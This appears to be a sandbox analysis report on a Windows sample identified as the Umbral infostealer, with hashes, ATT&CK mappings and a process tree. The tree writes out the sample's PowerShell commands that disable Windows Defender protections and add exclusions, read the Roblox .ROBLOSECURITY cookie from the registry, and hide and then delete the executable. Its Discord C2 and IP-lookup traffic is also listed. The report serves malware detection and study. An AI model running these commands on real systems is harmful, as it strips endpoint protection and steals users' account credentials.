Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
28-12-2024 16:18
Behavioral task
behavioral1
Sample
FN_kolt_woofer.exe
Resource
win7-20240729-en
General
-
Target
FN_kolt_woofer.exe
-
Size
229KB
-
MD5
88e82fa4e92eaed5b089d99ca669fbd3
-
SHA1
c6287977d98930e7022fc1c6dfbfc4e302b724c8
-
SHA256
1a4e8449edc0e1f28f95ee9eaba0129264d90168797e65c47502996b15fbcde5
-
SHA512
5759f49a352d54c5d6be12b9f03d15757a802bde7da91f28bdac2ccc22f1afb852e3d734e54eb2e7f2129c8c4213421f991692882a15569a93430e137c1d1e7b
-
SSDEEP
6144:lloZM+rIkd8g+EtXHkv/iD4T6FcHdmOhyU9va6vyvb8e1mti:noZtL+EP8T6FcHdmOhyU9va6vM/
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2112-1-0x0000000000D80000-0x0000000000DC0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2912 powershell.exe 1932 powershell.exe 2876 powershell.exe 2212 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts FN_kolt_woofer.exe -
Deletes itself 1 IoCs
pid Process 2260 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2260 cmd.exe 2136 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2932 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2136 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2112 FN_kolt_woofer.exe 2912 powershell.exe 1932 powershell.exe 2876 powershell.exe 2228 powershell.exe 2212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2112 FN_kolt_woofer.exe Token: SeIncreaseQuotaPrivilege 2256 wmic.exe Token: SeSecurityPrivilege 2256 wmic.exe Token: SeTakeOwnershipPrivilege 2256 wmic.exe Token: SeLoadDriverPrivilege 2256 wmic.exe Token: SeSystemProfilePrivilege 2256 wmic.exe Token: SeSystemtimePrivilege 2256 wmic.exe Token: SeProfSingleProcessPrivilege 2256 wmic.exe Token: SeIncBasePriorityPrivilege 2256 wmic.exe Token: SeCreatePagefilePrivilege 2256 wmic.exe Token: SeBackupPrivilege 2256 wmic.exe Token: SeRestorePrivilege 2256 wmic.exe Token: SeShutdownPrivilege 2256 wmic.exe Token: SeDebugPrivilege 2256 wmic.exe Token: SeSystemEnvironmentPrivilege 2256 wmic.exe Token: SeRemoteShutdownPrivilege 2256 wmic.exe Token: SeUndockPrivilege 2256 wmic.exe Token: SeManageVolumePrivilege 2256 wmic.exe Token: 33 2256 wmic.exe Token: 34 2256 wmic.exe Token: 35 2256 wmic.exe Token: SeIncreaseQuotaPrivilege 2256 wmic.exe Token: SeSecurityPrivilege 2256 wmic.exe Token: SeTakeOwnershipPrivilege 2256 wmic.exe Token: SeLoadDriverPrivilege 2256 wmic.exe Token: SeSystemProfilePrivilege 2256 wmic.exe Token: SeSystemtimePrivilege 2256 wmic.exe Token: SeProfSingleProcessPrivilege 2256 wmic.exe Token: SeIncBasePriorityPrivilege 2256 wmic.exe Token: SeCreatePagefilePrivilege 2256 wmic.exe Token: SeBackupPrivilege 2256 wmic.exe Token: SeRestorePrivilege 2256 wmic.exe Token: SeShutdownPrivilege 2256 wmic.exe Token: SeDebugPrivilege 2256 wmic.exe Token: SeSystemEnvironmentPrivilege 2256 wmic.exe Token: SeRemoteShutdownPrivilege 2256 wmic.exe Token: SeUndockPrivilege 2256 wmic.exe Token: SeManageVolumePrivilege 2256 wmic.exe Token: 33 2256 wmic.exe Token: 34 2256 wmic.exe Token: 35 2256 wmic.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe Token: SeIncreaseQuotaPrivilege 2828 wmic.exe Token: SeSecurityPrivilege 2828 wmic.exe Token: SeTakeOwnershipPrivilege 2828 wmic.exe Token: SeLoadDriverPrivilege 2828 wmic.exe Token: SeSystemProfilePrivilege 2828 wmic.exe Token: SeSystemtimePrivilege 2828 wmic.exe Token: SeProfSingleProcessPrivilege 2828 wmic.exe Token: SeIncBasePriorityPrivilege 2828 wmic.exe Token: SeCreatePagefilePrivilege 2828 wmic.exe Token: SeBackupPrivilege 2828 wmic.exe Token: SeRestorePrivilege 2828 wmic.exe Token: SeShutdownPrivilege 2828 wmic.exe Token: SeDebugPrivilege 2828 wmic.exe Token: SeSystemEnvironmentPrivilege 2828 wmic.exe Token: SeRemoteShutdownPrivilege 2828 wmic.exe Token: SeUndockPrivilege 2828 wmic.exe Token: SeManageVolumePrivilege 2828 wmic.exe Token: 33 2828 wmic.exe Token: 34 2828 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2112 wrote to memory of 2256 2112 FN_kolt_woofer.exe 30 PID 2112 wrote to memory of 2256 2112 FN_kolt_woofer.exe 30 PID 2112 wrote to memory of 2256 2112 FN_kolt_woofer.exe 30 PID 2112 wrote to memory of 2860 2112 FN_kolt_woofer.exe 33 PID 2112 wrote to memory of 2860 2112 FN_kolt_woofer.exe 33 PID 2112 wrote to memory of 2860 2112 FN_kolt_woofer.exe 33 PID 2112 wrote to memory of 2912 2112 FN_kolt_woofer.exe 35 PID 2112 wrote to memory of 2912 2112 FN_kolt_woofer.exe 35 PID 2112 wrote to memory of 2912 2112 FN_kolt_woofer.exe 35 PID 2112 wrote to memory of 1932 2112 FN_kolt_woofer.exe 37 PID 2112 wrote to memory of 1932 2112 FN_kolt_woofer.exe 37 PID 2112 wrote to memory of 1932 2112 FN_kolt_woofer.exe 37 PID 2112 wrote to memory of 2876 2112 FN_kolt_woofer.exe 39 PID 2112 wrote to memory of 2876 2112 FN_kolt_woofer.exe 39 PID 2112 wrote to memory of 2876 2112 FN_kolt_woofer.exe 39 PID 2112 wrote to memory of 2228 2112 FN_kolt_woofer.exe 41 PID 2112 wrote to memory of 2228 2112 FN_kolt_woofer.exe 41 PID 2112 wrote to memory of 2228 2112 FN_kolt_woofer.exe 41 PID 2112 wrote to memory of 2828 2112 FN_kolt_woofer.exe 43 PID 2112 wrote to memory of 2828 2112 FN_kolt_woofer.exe 43 PID 2112 wrote to memory of 2828 2112 FN_kolt_woofer.exe 43 PID 2112 wrote to memory of 1112 2112 FN_kolt_woofer.exe 45 PID 2112 wrote to memory of 1112 2112 FN_kolt_woofer.exe 45 PID 2112 wrote to memory of 1112 2112 FN_kolt_woofer.exe 45 PID 2112 wrote to memory of 1448 2112 FN_kolt_woofer.exe 47 PID 2112 wrote to memory of 1448 2112 FN_kolt_woofer.exe 47 PID 2112 wrote to memory of 1448 2112 FN_kolt_woofer.exe 47 PID 2112 wrote to memory of 2212 2112 FN_kolt_woofer.exe 49 PID 2112 wrote to memory of 2212 2112 FN_kolt_woofer.exe 49 PID 2112 wrote to memory of 2212 2112 FN_kolt_woofer.exe 49 PID 2112 wrote to memory of 2932 2112 FN_kolt_woofer.exe 51 PID 2112 wrote to memory of 2932 2112 FN_kolt_woofer.exe 51 PID 2112 wrote to memory of 2932 2112 FN_kolt_woofer.exe 51 PID 2112 wrote to memory of 2260 2112 FN_kolt_woofer.exe 53 PID 2112 wrote to memory of 2260 2112 FN_kolt_woofer.exe 53 PID 2112 wrote to memory of 2260 2112 FN_kolt_woofer.exe 53 PID 2260 wrote to memory of 2136 2260 cmd.exe 55 PID 2260 wrote to memory of 2136 2260 cmd.exe 55 PID 2260 wrote to memory of 2136 2260 cmd.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2860 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FN_kolt_woofer.exe"C:\Users\Admin\AppData\Local\Temp\FN_kolt_woofer.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\FN_kolt_woofer.exe"2⤵
- Views/modifies file attributes
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FN_kolt_woofer.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1112
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2212
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2932
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\FN_kolt_woofer.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2136
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YP3PYKWRFJA9987I5EFB.temp
Filesize7KB
MD556edc90d27ce5de9ed1e042a6ac16827
SHA1d9184bcca2251686f7375d771bd8479a3da0c001
SHA2569e236e1201edda1e8457f4acc63340189d37e94c21cb59dd96040fc517acb5fb
SHA512984a4f72412fbcd52f929d8a4639c462e99ecbc260309e32b124836efe30c24e8be4d1deb2abe6363f32351f09c75a5780d29c8942b43926456c523388af144c